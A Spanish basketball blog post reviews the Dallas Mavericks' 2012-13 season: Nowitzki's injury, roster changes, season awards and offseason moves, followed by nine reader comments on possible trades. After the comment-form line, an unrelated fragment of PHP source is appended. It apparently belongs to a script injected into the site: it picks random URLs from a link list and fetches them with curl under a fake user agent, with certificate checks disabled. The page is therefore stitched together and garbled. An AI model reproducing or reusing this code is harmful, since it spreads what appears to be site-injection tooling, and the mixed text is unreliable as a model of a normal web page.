Dallas Mavericks: Insuficiente

30 de July de 2013 por txusma

Resulta extraño que comiencen los playoffs y, justo en ese momento, cuando la cosa se pone más interesante todavía, desaparezcan las canastas imposibles de Dirk Nowitzki o las airadas protestas de Mark Cuban desde la grada. Pero así ha sido. Después de 12 años consecutivos, los Dallas Mavericks no se han clasificado para la lucha por el anillo. De hecho, en su lucha por conseguirlo, los tejanos nos han dejado, sin duda, una de las imágenes del año. Quién sabe si influenciados por la barba de la emergente estrella de otro equipo tejano, James Harden, los jugadores de los Mavericks decidieron no afeitarse hasta que el balance de victorias/derrotas estuviera al 50%. Al menos, eso sí lo consiguieron, pero el 41-41 final sabe a muy poco a la única franquicia que, no lo olvidemos, ha podido con los Heat de Lebron, Wade, Bosh y Riley. 

Hay muchos factores que influyen en el global de una temporada, pero en el caso de los Mavs, el principal, sin duda, ha sido la lesión de Dirk Nowitzki. El alemán se operó de la rodilla en la pretemporada y tardó 27 partidos en debutar. En ese momento, Dallas sólo llevaba 12 victorias. Obviamente, Robin Hood tardó en recuperar la forma y el equipo llegó a estar con un paupérrimo 13-20. Desde entonces, ya con Nowitzki  haciendo de Nowitzki , Dallas acabó la temporada con un más acorde 28-21, pero ya era demasiado tarde. El equipo mostró el orgullo que se presupone a una franquicia acostumbrada a ganar en los último años, pero sin Nowitzki, estuvieron demasiado huérfanos y, quién sabe si algo acomodados y para cuando comenzaron a remontar, ya era demasiado tarde.

Y es que hay una serie de jugadores que no han rendido mal durante la temporada, pero quién sabe si por conformismo o por culpa de Carlisle, no dieron el paso adelante necesario cuando más se les necesitó. Hablo de jugadores como Vince Carter, Shawn Marion, Elton Brand o Chris Kaman. Más allá de las estadísticas individuales y problemas con las lesiones, son jugadores de con suficiente experiencia en la liga como para lidiar mejor con situaciones tan complicadas como la que atravesaron a comienzos de temporada.

Kaman y Brand no seguirán en Dallas, rumbo a Lakers y Hawks, como tampoco lo harán 2 jugadores exteriores cuya temporada casi paralela. Hablamos de Darren Collison y OJ Mayo. Los 2 llegaron a Dallas en pretemporada y los 2 abandonan los Mavs tras un año en el equipo. Collison dejó Indiana y pese que debía ser indiscutible, fue de más a menos y nunca llegó a tener la plena confianza de Carlisle. Ahora será un suplente de lujo de Chris Paul en los Clippers. Por su parte, Mayo pasó de ser el eterno sexto hombre en los Grizzlies a ser titular indiscutible en los Mavs. Mayo, que también fue de más a menos, volvió a recordar al de sus 2 primeros años en Memphis, sobre todo en ausencia de Nowitzki, lo que le ha valido un buen contrato en Milwaukee, donde ocupará el puesto de Monta Ellis, curiosamente, el próximo escolta titular de Dallas.

Y es que el final de temporada ha sido tan decepcionante como el resto. Cuban se lo jugó todo a una carta, pero Howard se quedó con las barbas de Harden. En su lugar, ha llegado Dalembert, tras un mal año en Milwaukee. No parece lo mismo. Tras la decepción de no hacerse con DH12, Cuban buscó un cerebro que ordenase las cosas, y fichó a Calderón, y una amenaza exterior, que acompañe a Dirk en la faceta anotadora, y fichó a Monta Ellis. Sin duda Carlisle tiene un arduo trabajo por delante para devolver a Dallas al lugar que se ha ganado en la última década. Eso sí, con Nowitzki sano, todo parece un poco más fácil.

PREMIOS

MVP: No ha sido, ni de lejos, el mejor año de Dirk Nowitzki, de hecho, estadísticamente hablando, solamente su temporada rookie fue peor, pero aún así le ha bastado para ser el mejor del equipo cuando la salud se lo ha permitido. En 53 partidos, Robin Hood ha anotado más de 17 puntos y ha capturado casi 7 rebotes. Además, por cuarta vez en su carrera, ha estado por encima del 40% en triples. Vamos, queda Nowitzki para rato.

Rookie: Sin alardes, pero Jae Crowder ha sido una alegría en una temporada con muy pocas que llevarse a la boca. Elegido en segunda ronda, ha llegado a ser titular en 16 partidos, sobre todo gracias a una intensidad defensiva muy del agrado de Carlisle. 5 puntos, con malos porcentajes y más de 2 rebotes. Necesita mejorar, pero su primer año no es malo.

Sorpresa: Tras un mal año pasado, esta temporada pocos esperaban que Vince Carter, uno de los sospechosos habituales, volviera a elevar su rendimiento. Más allá de los 13 puntos, con buenos porcentajes y 4 rebotes, Carter ha vuelto a dejar algunos destellos del jugador que desató la Vinsanity. Incluso apareció, casi de forma testimonial, en la lista de jugadores votados para mejor sexto hombre.

Decepción: Excepción hecha de Tyson Chandler, empieza a ser casi habitual que el elegido para cubrir el puesto de 5 en Dallas decepcione. Y Chris Kaman no ha sido una excepción. A pesar de sus problemas físicos, sus 10 puntos y 5,6 rebotes en poco más de 20 minutos saben a poco.

Esfuerzo en vano: Como ya ha quedado claro, si los Mavericks no han jugado los Playoffs, no será porque Dirk Nowitzki no haya hecho todo lo posible.

JUGANDO A GM

Observando la plantilla de Dallas, salta a la vista el desequilibrio entre el juego exterior y el interior. Todos los refuerzos veraniegos han llegado por fuera. Calderón y Ellis, vía agencia libre y Larkin, Ledo y Mekel, vía draft. Por dentro, esperaban a Howard y lo que tienen es Dalembert, así que ahí está el trabajo que tienen los Mavs este verano. De momento, han renovado a Brandan Wright, que ha cuajado una temporada muy sólida. En apenas 18 minutos, 8,5 puntos, con un 60% en tiros de campo, 4 rebotes y más de un tapón. No está mal, pero sin duda no es suficiente. Se habla de Dallas como uno de los equipos interesados en Oden, pero más que una solución, parecería un milagro. O Dalembert recuerda el jugador que fue hace 6 ó 7 temporadas, o Dallas necesita moverse.

Además, Carlisle deberá acoplar a la dupla Calderón/Ellis. Si esa pareja funciona, todo será más fácil. Con ellos 2, Nowitzki, Marion y Carter, más lo que aporte el resto, Dallas debería estar de nuevo inmerso en la lucha por los Playoffs, aunque, con la plantilla actual, parece difícil que aspirando a mucho más.

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Varejao podría ser una buena solución no? No sé de qué manera ni qué tendría que dar Dallas, pero un Nowitzki-Varejao por dentro más Calde, Ellis y Marion por fuera, ya sería un equipo para tener muy en cuenta, con los rookies ayudando desde fuera, Vicente anotando que da gusto, y el trabajo de Wright y Dalembert en la zona. Está claro que si llega ese pívot de calidad, ya sea Oden o otro, el equipo tendría aspiraciones para algo más, anillo no creo, pero sí pasar de primera ronda.

      Citar

  2. Heineken dice:
    #2

    Sancho88:
    Varejao podría ser una buena solución no? No sé de qué manera ni qué tendría que dar Dallas, pero un Nowitzki-Varejao por dentro más Calde, Ellis y Marion por fuera, ya sería un equipo para tener muy en cuenta, con los rookies ayudando desde fuera, Vicente anotando que da gusto, y el trabajo de Wright y Dalembert en la zona. Está claro que si llega ese pívot de calidad, ya sea Oden o otro, el equipo tendría aspiraciones para algo más, anillo no creo, pero sí pasar de primera ronda.

    Creo recordar que los Cavs ya intentaron un Varejao x Marion y que Dallas rechazó porque iba a por Howard.

      Citar

  3. Sancho88 dice:
    #3

    No obstante, finalmente traspasarán a Dalembert y Ellis por Cousins. Eso está claro

      Citar

  4. rumbero dice:
    #4

    Los PO sin Dirk son menos Playoffs. No se puede decir que no lo intentaran pero parece que llevan dos temporadas tirando de plan B y no funciona. Como se dice Collison, Mayo, Brand y Kaman ya no están. Y eso que OJ empezó de maravilla pero se apagó con la vuelta del alemán. Y un Collison sin competencia que acabó perdiendo la titularidad con la joven promesa Mike James.
    Y ahora Cuban los ha cambiado por Calderon, Ellis, Dalembert y posiblemente ( y como decía por twitter el cachondo de Nowitzki) su DH particular: Devin Harris. Es que ahora mismo si Dirk no está al mejor nível y Ellis no asume que Calde va a tener el balón lo pueden pasar mal para entrar en PO con equipos como Wolves, Blazers y Pelicans por ahí.

      Citar

  5. Esteban dice:
    #5

    para que aprendan los lakers,

    tanto dallas como boston de la noche a la mañana tuvieron 60 millones para gastar y no fueron a ningun lado

    a menmos que 3 super estrellas (y una sea lebron) se bajen el salario y firmen por menos en tu equipo, es imposibnle de un año a otro, con menos de 70 millones armar un equipo contendiente

      Citar

  6. rumbero dice:
    #6

    Pues para rellenar el juego interior parece que va a llegar Blair. Un año de contrato por el mínimo. De lo mejor que podían encontrar ahora mismo

      Citar

  7. Denise dice:
    #7

    rumbero:
    Pues para rellenar el juego interior parece que va a llegar Blair. Un año de contrato por el mínimo. De lo mejor que podían encontrar ahora mismo

    Gran fichaje para los Mavs, a pesar de su baja estatura puede jugar tanto al lado de Nowitzki como ser usado para darle descanso al aleman.
    Lo que no sé es si su estado fisico actual es muy malo y por eso Popovych no le dio minutos y por eso tambien ha tardado tanto en encontrar equipo, porque de calidad, en mi opinión es mejor que Splitter y Diaw.

      Citar

  8. rumbero dice:
    #8

    Denise
    Lo que no sé es si su estado fisico actual es muy malo y por eso Popovych no le dio minutos y por eso tambien ha tardado tanto en encontrar equipo, porque de calidad, en mi opinión es mejor que Splitter y Diaw.

    Fue más un tema de actitud que de estado físico, de ahí que se fuera hundiendo en la rotación. Más calidad que ganas, y eso con Pop no vale.

      Citar

  9. r_miller dice:
    #9

    Sancho88:
    No obstante, finalmente traspasarán a Dalembert y Ellis por Cousins. Eso está claro

    Si hay algo que los kings no necesitan es un escolta y no acabo de ver muy claro este traspaso

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>